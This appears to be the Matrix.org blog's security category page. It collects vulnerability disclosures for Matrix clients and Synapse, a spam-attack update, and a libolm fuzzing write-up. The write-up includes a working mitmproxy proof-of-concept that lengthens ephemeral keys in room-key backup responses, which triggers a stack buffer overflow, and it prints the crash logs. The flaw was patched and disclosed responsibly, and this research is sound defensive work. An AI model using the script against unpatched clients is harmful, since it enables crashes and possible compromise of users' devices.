Category – Security
22 posts tagged with "Security" (See all categories)

Disclosing CVE-2021-40823 and CVE-2021-40824: E2EE vulnerability in multiple Matrix clients

2021-09-13 — Security — Denis Kasak, Dan Callahan, and Matthew Hodgson

Today we are disclosing a critical security issue affecting multiple Matrix clients and libraries including Element (Web/Desktop/Android), FluffyChat, Nheko, Cinny, and SchildiChat. Element on iOS is not affected.

Specifically, in certain circumstances it may be possible to trick vulnerable clients into disclosing encryption keys for messages previously sent by that client to user accounts later compromised by an attacker.

Exploiting this vulnerability to read encrypted messages requires gaining control over the recipient’s account. This requires either compromising their credentials directly or compromising their homeserver.

Thus, the greatest risk is to users who are in encrypted rooms containing malicious servers. Admins of malicious servers could attempt to impersonate their users' devices in order to spy on messages sent by vulnerable clients in that room.

This is not a vulnerability in the Matrix or Olm/Megolm protocols, nor the libolm implementation. It is an implementation bug in certain Matrix clients and SDKs which support end-to-end encryption (“E2EE”).

We have no evidence of the vulnerability being exploited in the wild.

This issue was discovered during an internal audit by Denis Kasak, a security researcher at Element.

Remediation and Detection

Patched versions of affected clients are available now; please upgrade as soon as possible — we apologise sincerely for the inconvenience. If you are unable to upgrade, consider keeping vulnerable clients offline until you can. If vulnerable clients are offline, they cannot be tricked into disclosing keys. They may safely return online once updated.

Unfortunately, it is difficult or impossible to retroactively identify instances of this attack with standard logging levels present on both clients and servers. However, as the attack requires account compromise, homeserver administrators may wish to review their authentication logs for any indications of inappropriate access.

Similarly, users should review the list of devices connected to their account with an eye toward missing, untrusted, or non-functioning devices. Because an attacker must impersonate an existing or historical device, exploiting this vulnerability would either break an existing login on the user’s account, or a historical device would be re-added and flagged as untrusted.

Lastly, if you have previously verified the users / devices in a room, you would witness the safety shield on the room turn red during the attack, indicating the presence of an untrusted and potentially malicious device.

Affected Software

Given the severity of this issue, Element attempted to review all known encryption-capable Matrix clients and libraries so that patches could be prepared prior to public disclosure.

Known vulnerable software:

We believe the following software is not vulnerable:

We believe the following are not vulnerable due to not implementing key sharing:

Background

Matrix supports the concept of “key sharing”, letting a Matrix client which lacks the keys to decrypt a message request those keys from that user's other devices or the original sender's device.

This was a feature added in 2016 in order to address edge cases where a newly logged-in device might not have the necessary keys to decrypt historical messages. Specifically, if other devices in the room are unaware of the new device due to a network partition, they have no way to encrypt for it—meaning that the only way the new device will be able to decrypt history is if the recipient's other devices share the necessary keys with it.

Other situations where key sharing is desirable include when the recipient hasn't backed up their keys (either online or offline) and needs them to decrypt history on a new login, or when facing implementation bugs which prevent clients from sending keys correctly. Requesting keys from a user's other devices sidesteps these issues.

Key sharing is described here in the Matrix E2EE Implementation Guide, which contains the following paragraph:

In order to securely implement key sharing, clients must not reply to every key request they receive. The recommended strategy is to share the keys automatically only to verified devices of the same user.

This is the approach taken in the original implementation in matrix-js-sdk, as used in Element Web and others, with the extension of also letting the sending device service keyshare requests from recipient devices. Unfortunately, the implementation did not sufficiently verify the identity of the device requesting the keyshare, meaning that a compromised account can impersonate the device requesting the keys, creating this vulnerability.

This is not a protocol or specification bug, but an implementation bug which was then unfortunately replicated in other independent implementations.

While we believe we have identified and contacted all affected E2EE client implementations: if your client implements key sharing requests, we strongly recommend you check that you cryptographically verify the identity of the device which originated the key sharing request.

Next Steps

The fact that this vulnerability was independently introduced so many times is a clear signal that the current wording in the Matrix Spec and the E2EE Implementation Guide is insufficient. We will thoroughly review the related documentation and revise it with clear guidelines on safely implementing key sharing.

Going further, we will also consider whether key sharing is still a necessary part of the Matrix protocol. If it is not, we will remove it. As discussed above, key sharing was originally introduced to make E2EE more reliable while we were ironing out its many edge cases and failure modes. Meanwhile, implementations have become much more robust, to the point that we may be able to go without key sharing completely. We will also consider changing how we present situations in which you cannot decrypt messages because the original sender was not aware of your presence. For example, undecryptable messages could be filed in a separate conversation thread, or those messages could require that keys are shared manually, effectively turning a bug into a feature.

We will also accelerate our work on matrix-rust-sdk as a portable reference implementation of the Matrix protocol, avoiding the implicit requirement that each independent library must necessarily reimplement this logic on its own. This will have the effect of reducing attack surface and simplifying audits for software which chooses to use matrix-rust-sdk.

Finally, we apologise to the wider Matrix community for the inconvenience and disruption of this issue. While Element discovered this vulnerability during an internal audit of E2EE implementations, we will be funding an independent end-to-end audit of the reference Matrix E2EE implementations (not just Olm + libolm) in the near future to help mitigate the risk from any future vulnerabilities. The results of this audit will be made publicly available.

Timeline

Ultimately, Element took two weeks from initial discovery to completing an audit of all known, public E2EE implementations. It took a further week to coordinate disclosure, culminating in today's announcement.

  • Monday, 23rd August — Discovery that Element Web is exploitable.
  • Thursday, 26th August — Determination that Element Android is exploitable with a modified attack.
  • Wednesday, 1 September — Determination that Element iOS fails safe in the presence of device changes.
  • Friday, 3 September — Determination that FluffyChat and Nheko are exploitable.
  • Tuesday, 7th September — Audit of Matrix clients and libraries complete.
  • Wednesday, 8th September — Affected software authors contacted, disclosure timelines agreed.
  • Friday, 10th September — Public pre-disclosure notification. Downstream packagers (e.g., Linux distributions) notified via Matrix and e-mail.
  • Monday, 13th September — Coordinated releases of all affected software, public disclosure.

Pre-disclosure: upcoming critical fix for several popular Matrix clients

2021-09-10 — Security — Matrix Security

Hi all,

A critical security vulnerability impacting several popular Matrix clients and libraries was recently discovered. A coordinated security release of the affected components will be happening in the afternoon (from an UTC perspective) of Monday, Sept 13th.

We will be reaching out to downstream packagers to ensure they can prepare patched versions of affected packages at the time of the release. The details of the vulnerability will be disclosed in a blog post on the day of the release. There is so far no evidence of the vulnerability being exploited in the wild.

Please be prepared to upgrade as soon as the patched versions are released.

Thank you for your patience while we work to resolve this issue.

Synapse 1.41.1 released

2021-08-31 — Releases, Security — Dan Callahan

Today we are releasing Synapse 1.41.1, a security update based on last week's release of Synapse 1.41.0. This release patches two moderate severity issues which could reveal metadata about private rooms:

  • GHSA-3x4c-pq33-4w3q / CVE-2021-39164: Enumerating a private room's list of members and their display names.

    If an unauthorized user both knows the Room ID of a private room and that room's history visibility is set to shared, then they may be able to enumerate the room's members, including their display names.

    The unauthorized user must be on the same homeserver as a user who is a member of the target room.

  • GHSA-jj53-8fmw-f2w2 / CVE-2021-39163: Disclosing a private room's name, avatar, topic, and number of members.

    If an unauthorized user knows the Room ID of a private room, then its name, avatar, topic, and number of members may be disclosed through Group / Community features.

    The unauthorized user must be on the same homeserver as a user who is a member of the target room, and their homeserver must allow non-administrators to create groups (enable_group_creation in the Synapse configuration; off by default).

Note that in both cases:

  • The private room's Room ID must be known to the attacker.
  • Another user on the attacker's homeserver must be a legitimate member of the target room.
  • The information disclosed is already present in the database and thus legitimately known to the administrators of homeservers participating in the target room.

We'd like to credit 0xkasper for discovering and responsibly disclosing these issues.

This release also fixes a small regression in 1.41.0 (#10709) which broke compatibility with older Twisted versions when Synapse was a configured to send email.

Please update at your earliest convenience.

Security update: Synapse 1.37.1 released

2021-06-30 — Releases, Security — Matthew Hodgson

Hi all,

Over the last few days we've seen a distributed spam attack across the public Matrix network, where large numbers of spambots have been registered across servers with open registration and then used to flood abusive traffic into rooms such as Matrix HQ.

The spam itself has been handled by temporarily banning the abused servers. However, on Monday and Tuesday the volume of traffic triggered performance problems for the homeservers participating in targeted rooms (e.g. memory explosions, or very delayed federation). This was due to a combination of factors, but one of the most important ones was Synapse issue #9490: that one busy room could cause head-of-line blocking, starving your server from processing events in other rooms, causing all traffic to fall behind.

We're happy to say that Synapse 1.37.1 fixes this and we now process inbound federation traffic asynchronously, ensuring that one busy room won't impact others. First impressions are that this has significantly improved federation performance and end-to-end encryption stability — for instance, new E2EE keys from remote users for a given conversation should arrive immediately rather than being blocked behind other traffic.

Please upgrade to Synapse 1.37.1 as soon as possible, in order to increase resilience to any other traffic spikes.

Also, we highly recommend that you disable open registration or, if you keep it enabled, use SSO or require email validation to avoid abusive signups. Empirically adding a CAPTCHA is not enough. Otherwise you may find your server blocked all over the place if it is hosting spambots.

Finally, if your server has open registration, PLEASE check whether spambots have been registered on your server, and deactivate them. Once deactivated, you will need to contact [email protected] to request that blocks on your server are removed.

Your best bet for spotting and neutralising dormant spambots is to review signups on your homeserver over the past 3-5 days and deactivate suspicious users. We do not recommend relying solely on lists of suspicious IP addresses for this task, as the distributed nature of the attack means any such list is likely to be incomplete or include shared proxies which may also catch legitimate users.

To ease review, we're working on an auditing script in #10290; feedback on whether this is useful would be appreciated. Problematic accounts can then be dealt with using the Deactivate Account Admin API.

Meanwhile, over to Dan for the Synapse 1.37 release notes.

Synapse 1.37 Release Announcement

Synapse 1.37 is now available!

Note: The legacy APIs for Spam Checker extension modules are now considered deprecated and targeted for removal in August. Please see the module docs for information on updating.

This release also removes Synapse's built-in support for the obsolete ACMEv1 protocol for automatically obtaining TLS certificates. Server administrators should place Synapse behind a reverse proxy for TLS termination, or switch to a standalone ACMEv2 client like certbot.

Knock, knock?

After nearly 18 months and 129 commits, Synapse now includes support for MSC2403: Add "knock" feature and Room Version 7! This feature allows users to directly request admittance to private rooms, without having to track down an invitation out-of-band. One caveat: Though the server-side foundation is there, knocking is not yet implemented in clients.

A Unified Interface for Extension Modules

Third party modules can customize Synapse's behavior, implementing things like bespoke media storage providers or user event filters. However, Synapse previously lacked a unified means of enumerating and configuring third-party modules. That changes with Synapse 1.37, which introduces a new, generic interface for extensions.

This new interface consolidates configuration into one place, allowing for more flexibility and granularity by explicitly registering callbacks with specific hooks. You can learn more about the new module API in the docs linked above, or in Matrix Live S6E29, due out this Friday, July 2nd.

Safer Reauthentication

User-interactive authentication ("UIA") is required for potentially dangerous actions like removing devices or uploading cross-signing keys. However, Synapse can optionally be configured to provide a brief grace period such that users are not prompted to re-authenticate on actions taken shortly after logging in or otherwise authenticating.

This improves user experience, but also creates risks for clients which rely on UIA as a guard against actions like account deactivation. Synapse 1.37 protects users by exempting especially risky actions from the grace period. See #10184 for details.

Smaller Improvements

We've landed a number of smaller improvements which, together, make Synapse more responsive and reliable. We now:

  • More efficiently respond to key requests, preventing excessive load (#10221, #10144)
  • Render docs for each vX.Y Synapse release, starting with v1.37 (#10198)
  • Ensure that log entries from failures during early startup are not lost (#10191)
  • Have a notion of database schema "compatibility versions", allowing for more graceful upgrades and downgrades of Synapse (docs)

We've also resolved two bugs which could cause sync requests to immediately return with empty payloads (#8518), producing a tight loop of repeated network requests.

Everything Else

Lastly, we've merged an experimental implementation of MSC2716: Incrementally importing history into existing rooms (#9247) as part of Element's work to fully integrate Gitter into Matrix.

These are just the highlights; please see the Upgrade Information and Release Notes for a complete list of changes in this release.

Synapse is a Free and Open Source Software project, and we'd like to extend our thanks to everyone who contributed to this release, including aaronraimist, Bubu, dklimpel, jkanefendt, lukaslihotzki, mikure, and Sorunome,

Adventures in fuzzing libolm

2021-06-14 — Security, Research — Denis Kasak

Introduction

Hi all! My name is Denis and I'm a security researcher. Six months ago, I started working for Element on doing dedicated security research on important Matrix projects. After some initial focus on Synapse, I decided to take a closer look at libolm. In this entry, I'd like to present an overview of that work, along with some early fruits that came out of it.

TL;DR: we found some bugs which had crept in since libolm's original audit in 2016, thanks to properly overhauling our fuzzing capability, and we'd like to tell you all about it! The bugs were not easily exploitable (if at all), and have already been fixed.

Update: CVE-2021-34813 has now been assigned to this.

To give a bit of a background, libolm is a cryptographic library implementing the Double Ratchet Algorithm pioneered by Signal and it is the cryptographic workhorse behind Matrix. The classic algorithm is called Olm in Matrix land, but libolm also implements Megolm which is a variant for efficient encrypted group chats between many participants.

Since libolm is currently used in all Matrix clients supporting end-to-end encryption, it makes for a particularly juicy target. The present state of libolm's monopoly on Matrix encryption is somewhat unfortunate -- luckily there are some exciting new developments on the horizon, such as the vodozemac implementation in Rust. But for now, we're stuck with libolm.

To start, I decided to do a bit of fuzzing. libolm already had a fuzzing setup using AFL, but it was written a while ago. The state of the art in fuzzing had advanced quite rapidly in the last few years, so the setup was missing many modern features and techniques. As an example, the fuzzing setup was configured to use the now ancient afl-gcc coverage mode, which can be slower than the more modern LLVM-based coverage by a factor of 2.

I also noticed that the fuzzing was done with non-hardened binaries (instead of using something like ASAN), so many memory errors could've gone unnoticed. There were also no corpora available from previous fuzzing runs and some of the newer code was not covered by the harnesses.

Preparation

I decided to tackle these one by one, adding ASAN and MSAN builds as a first step. I took the opportunity to switch to AFL++ since it is a drop-in replacement and contains numerous improvements, notably improved coverage modes which are either much faster (e.g. LLVM-PCGUARD) or guaranteed to have no collisions (LTO)1. AFL++ also optimizes mutation scheduling (by using scheduling algorithms from AFLFast) and mutation operator selection (through MOpt). All of this makes it much more efficient at discovering bugs.

After this, I changed the existing harnesses to use AFL's persistent mode (which lowers process creation overhead and thus increases fuzzing performance). This change, combined with the switch to a newer coverage mode, increased the fuzzing exec/s from ~2.5k to ~5.5k on my machine, so this is not an insignificant gain!

After this preparatory work, I generated a small initial corpus and ran a small fleet of fuzzers with varying parameters. Almost immediately, I started getting heaps of crashes. Luckily, after some investigation, these turned out not to be serious bugs in the library but a double-free in the fuzzing harness! The double-free only got triggered when the input was of size 0. It also only happened with AFL++ and not vanilla AFL, presumably due to differences in input trimming logic, which must be the reason no one noticed this earlier. I quickly came up with a patch and resumed.

The plot thickens

I let the fuzzers run for a while. Since ASAN introduces a bit of a performance overhead, I only run a single AFL instance with ASAN variant of the binary. This is okay because all fuzzer instances actually synchronize their findings, which means every instance gets to see every input which increases coverage. When I came back to check, there was another crash waiting. This time the crashing input wasn't being generated continually so it looked much more promising -- and only the ASAN instance was crashing. A-ha!

Running the offending input on the ASAN variant of the harness revealed it was an invalid read one byte past the end of a heap buffer. The read was happening in the base64 decoder:

❮ ./build/fuzzers/fuzz_group_decrypt_asan "" pickled-inbound-group-session.txt <input
=================================================================
==1838065==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf4a00795 at pc 0x56560660 bp 0xffff9df8 sp 0xffff9de8
READ of size 1 at 0xf4a00795 thread T0
    #0 0x5656065f in olm::decode_base64(unsigned char const*, unsigned int, unsigned char*) src/base64.cpp:124
    #1 0x565607b5 in _olm_decode_base64 src/base64.cpp:165
    #2 0x565d5a9e in olm_group_decrypt_max_plaintext_length src/inbound_group_session.c:304
    #3 0x56558e75 in main fuzzers/fuzz_group_decrypt.cpp:46
    #4 0xf7509a0c in __libc_start_main (/usr/lib32/libc.so.6+0x1ea0c)
    #5 0x5655a0f4 in _start (/home/dkasak/code/olm/build/fuzzers/fuzz_group_decrypt_asan+0x50f4)

0xf4a00795 is located 0 bytes to the right of 5-byte region [0xf4a00790,0xf4a00795)
allocated by thread T0 here:
    #0 0xf7a985c5 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x56558ce3 in main fuzzers/fuzz_group_decrypt.cpp:32
    #2 0xf7509a0c in __libc_start_main (/usr/lib32/libc.so.6+0x1ea0c)

SUMMARY: AddressSanitizer: heap-buffer-overflow src/base64.cpp:124 in olm::decode_base64(unsigned char const*, unsigned int, unsigned char*)
Shadow bytes around the buggy address:
  0x3e9400a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3e9400f0: fa fa[05]fa fa fa 05 fa fa fa fa fa fa fa fa fa
  0x3e940100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1838065==ABORTING

Following the stack trace, I quickly pinpointed the root of the bug: the logic of the decoder was subtly flawed, unconditionally accessing a remainder byte2 in the base64 input which might not actually be there. This occurs when the input is 1 (mod 4) in length, which can never happen in a valid base64 payload, but of course we cannot assume all inputs are necessarily valid payloads. Specifically, if the payload was not 0 (mod 4) in length, the code was assuming it was at least 2 (mod 4) or more in length and immediately read the second byte. This spurious byte was then incorporated into the output value.

I examined the code in an attempt to find a way to have it leak more than a single byte, but it was impossible. As it turned out, not even the full byte of useful information was encoded into the output -- due to the way the byte is encoded, only about 6 bits of useful information ended up in the output value.

Still, even a single leaked bit is too much in a cryptographic context. Could we do some heap hacking so that something of interest is placed there and then have it be leaked to us?

I next tracked down all call sites of the vulnerable function olm::decode_base64. Most of them were immune to the problem since they were preceded with calls to another function, olm::decode_base64_length, which checks that the base64 payload is of legal length. This left me with only a few potentially vulnerable call sites, so I examined where their base64 inputs come from. Promisingly, two of them received input from other conversation participants, but they either had no way of leaking the information back to the attacker or they hardcoded the number of bytes to be processed, after ensuring the input was of some minimum length. The output of the remaining function olm_pk_decrypt is never sent anywhere externally, so there was again no way of leaking the data to the attacker.

In conclusion, even though this invalid read is a valid bug, I was not able to find a working exploit for it.

But wait a second! Something was still bothering me about olm_pk_decrypt. It's a fairly complex function, receives several string inputs from the homeserver and it itself isn't tested by any of the harnesses. Furthermore, the reason I started looking at it in the first place is that it was missing the olm::decode_base64_length check. Perhaps it warrants a closer look?

It does

And sure enough, there was something amiss. As olm_pk_decrypt receives three base64 inputs from the homeserver: the ciphertext to decrypt, an ephemeral public key and a MAC. All three are eventually passed to olm::decode_base64 to be decoded. Yet there was only a single length check there, to ensure the decrypted ciphertext would fit its output buffer. What would happen if the server returned a public key that was longer than expected?

struct _olm_curve25519_public_key ephemeral;
olm::decode_base64(
    (const uint8_t*)ephemeral_key, ephemeral_key_length,
    (uint8_t *)ephemeral.public_key
);

As can be seen from the snippet, the decoded version of public key gets written to ephemeral.public_key, which is an array allocated on the stack. If the input is longer than expected, this will become a stack buffer overflow.

The purpose of olm_pk_decrypt is to decrypt secrets previously stored by a Matrix device on the homeserver. The point of encryption is to prevent the server from learning these secrets since they're supposed to be known only by your own devices. One use case for this mechanism is to allow one of your devices to store encrypted end-to-end encryption keys on the homeserver. Your other devices can then retrieve those keys from the homeserver, making it possible to view all of your private conversations on each of your devices.

I decided to go for an end-to-end test to confirm the bug is triggerable by connecting with the latest Element Android from my test phone to my homeserver, with mitmproxy sitting in between. This allowed me to write a small mitmproxy script which intercepts HTTP calls fetching the E2E encryption keys from the homeserver and modifies the response so that the key is longer than expected.

import json

from mitmproxy import ctx, http


def response(flow: http.HTTPFlow) -> None:
    if ("/_matrix/client/unstable/room_keys/keys" in flow.request.pretty_url
            and flow.request.method == "GET"):

        response_body = flow.response.content.decode("utf-8")
        response_json = json.loads(response_body)

        rooms = response_json["rooms"]
        room_id = list(rooms.keys())[0]

        sessions = rooms[room_id]["sessions"]
        session = list(sessions.keys())[0]
        session_data = sessions[session]["session_data"]

        ephemeral = session_data["ephemeral"]
        ctx.log.info(f"Replacing ephemeral key '{ephemeral}' with '{ephemeral * 10}'")
        session_data["ephemeral"] = ephemeral * 10

        modified_body = json.dumps(response_json).encode("utf-8")
        flow.response.content = modified_body

This longer value is then eventually passed by Element Android to libolm's olm_pk_decrypt, which triggers the buffer overflow. With all of that in place, I deleted the local encryption key backup on my device and asked for it to be restored from the server:

F libc    : stack corruption detected (-fstack-protector)
F libc    : Fatal signal 6 (SIGABRT), code -6 (SI_TKILL) in tid 24517 (DefaultDispatch), pid 24459 (im.vector.app)
F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
F DEBUG   : Build fingerprint: 'xiaomi/tissot/tissot_sprout:9/PKQ1.180917.001/V10.0.24.0.PDHMIXM:user/release-keys'
F DEBUG   : Revision: '0'
F DEBUG   : ABI: 'arm64'
F DEBUG   : pid: 24459, tid: 24517, name: DefaultDispatch  >>> im.vector.app <<<
F DEBUG   : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
F DEBUG   : Abort message: 'stack corruption detected (-fstack-protector)'
F DEBUG   :     x0  0000000000000000  x1  0000000000005fc5  x2  0000000000000006  x3  0000000000000008
F DEBUG   :     x4  0000000000000000  x5  0000000000000000  x6  0000000000000000  x7  0000000000000030
F DEBUG   :     x8  0000000000000083  x9  7d545b4513138652  x10 0000000000000000  x11 fffffffc7ffffbdf
F DEBUG   :     x12 0000000000000001  x13 0000000060b0f2a9  x14 0022ed916fede200  x15 0000d925cd93f18f
F DEBUG   :     x16 00000079e741b2b0  x17 00000079e733c9d8  x18 0000000000000000  x19 0000000000005f8b
F DEBUG   :     x20 0000000000005fc5  x21 0000007940e3c400  x22 000000000000026b  x23 00000000000001d0
F DEBUG   :     x24 000000000000002f  x25 000000793d9653f0  x26 0000007948303368  x27 0000007945dd5588
F DEBUG   :     x28 00000000000001d0  x29 0000007945dd37d0
F DEBUG   :     sp  0000007945dd3790  lr  00000079e732e00c  pc  00000079e732e034

Impact

This vulnerability is a server-controlled stack buffer overflow in Matrix clients supporting room key backup.

Of course, the largest fear stemming from any remotely controlled stack buffer overflow is code execution. This is perhaps even doubly so in a cryptographic library, where we have the additional worry of an attacker being able to leak our dearly protected conversations.

The federated architecture of Matrix may be somewhat of a mitigating circumstance in this case, since users are much more likely to know and trust the homeserver owner, but we don't want to have to rely on this trust.

Native binaries

Luckily, on its own, this bug is not enough to successfully execute code on native binaries. By default, libolm is compiled for all supported targets with stack canaries (also called stack protectors or stack cookies), which are magic values unknown to the attacker, placed just before the current function's frame on the stack. This value is checked upon returning from the function -- if its value is changed, the process aborts itself to prevent further damage. This is evident from the Abort message: 'stack corruption detected (-fstack-protector)' message above. Besides canaries, other system-level protections exist to make exploiting bugs such as this harder, such as ASLR.

Therefore, to achieve remote code execution, an attacker would need to find additional vulnerabilities which would allow him to exfiltrate the stack canary and addresses of key memory locations from the system.

WASM

With WASM, the analysis is much more complicated due to its very different memory and execution model. In WASM, the unmanaged stack is generally much more vulnerable due to it missing support for stack canaries. This implies a stack buffer overflow can not only overwrite the frame of the function in which the overflow occurred but also all parent frames.

On the other hand, due to typed calls and much stronger control-flow integrity techniques, it's much harder for the attacker to make the code do something that is (maliciously) useful. Notably, return addresses live outside unmanaged memory and are out of reach to the attacker. Because of this, the primary way of influencing code execution is by manipulating call_indirect instructions in such a way as to call.

The analysis of the impact of this bug on the WASM binary is thus left as an exercise to the reader. If you're interested, the 2020 USENIX paper Everything Old is New Again: Binary Security of WebAssembly is a great starting point.

The fix

Once the problems were identified, the patches were rather trivial and the issues were promptly resolved. The first libolm release that includes the fix is 3.2.3 which was released on 2021-05-25.

We reached out to all Matrix clients which were determined to be affected. The Element client versions which first fix the issue are as follows:

  • Element Web/Desktop: v1.7.29
  • Element Android: v1.1.9
  • Element iOS: v1.4.0

For the mobile clients, these versions are already available in their respective application stores at the time of publishing this post. If you haven't already, please upgrade.

Future work

Even though the fuzzing setup is in a much better shape now (or rather will be, since I still have some PRs to merge upstream), there's still a lot that can be done to further improve it.

Right now, there are undoubtedly parts of the codebase that are not fuzzed well. The reasons for this range from the obvious, like some parts of the code simply not being called by any the existing harnesses, to more subtle ones such as the fact that cryptographic operations form a nearly-insurmountable natural barrier for naive fuzzing operations3. Finally, some of the existing harnesses accept additional parameters as command-line arguments, meaning we would have to re-run the same harness with different values of those parameters in order to reach full coverage of the code. This is suboptimal.

So the plan for future work is roughly as follows:

  1. Write missing harnesses to cover more portions of the codebase.
  2. Write starting corpus generators. These should generate believable, valid input for each of the harnesses. For example, for the decryption harness, we should generate a variety of encrypted messages: empty, short, long, text, binary, etc.
  3. Modify the harnesses so that their extra parameters are determined from the fuzzed input. This will allow the fuzzer to vary these itself, which reduces the importance of the human in the loop and makes it harder to forget some combination.
  4. Fuzz for some time until coverage stops increasing. The corpora generated should be saved so that future fuzzing attempts can resume from an earlier point so that this work is not wasted.
  5. Use afl-cov to investigate which parts of the code are not covered well or at all. This should inform us what further changes are needed.
  6. Write intelligent, custom mutators. These will allow the fuzzer to take a valid input and easily produce another valid input instead of only corrupting it with a high probability.
  7. Design harnesses which test for wanted semantic properties instead of only memory errors.

It's very exciting that we're able to do full-time security research on Matrix these days (thanks to Element's funding), and going forwards we'll publish any interesting discoveries for the visibility and education of the whole Matrix community. We'd also like to remind everyone that we run an official Security Disclosure Policy for Matrix.org and we'd welcome other researchers to come join our Hall of Fame! (And hopefully we will get more bounty programmes running in future.)


  1. In the context of fuzzing, collisions are situations where two different execution paths appear to the fuzzer as the same one due to technical limitations. Classically, AFL tracks coverage by tracking so-called "edges" (or "tuples"). Edges are really pairs of (A, B), where A and B represent basic blocks. Each edge is meant to represent a different execution "jump", but sometimes, as the number of basic blocks in a program grows, two different execution paths can end up being encoded as the same edge. LTO mode in AFL++ does some magic so that this is guaranteed not to happen.
  2. By remainder byte, I mean bytes which are not part of a group of 4. These can only occur at the end of a base64 payload and they're the ones that get suffixed with padding in padded base64.
  3. Classic fuzzers famously have a hard time circumventing magic values and checksums, and cryptography is full of these. This is further complicated by the fact that the double ratchet algorithm is very stateful and depends on the two ratchets evolving in lockstep. This means that even if, for example, the decryption harness is supplied with a corpus of valid encrypted messages, the mutations done by the fuzzer would only manage to produce corrupted versions of those messages which will fail to decrypt, but it will ~never manage to produce a different valid encrypted message.

Synapse 1.33.2 released

2021-05-11 — Releases, Security — Dan Callahan

Synapse 1.33.2 is now available.

This release fixes a denial of service issue (CVE-2021-29471) where evaluating specially crafted push rules could lead to excessive CPU load. Server administrators are encouraged to upgrade.

To learn more about Synapse 1.33, see last week's release announcement.

NextPage 2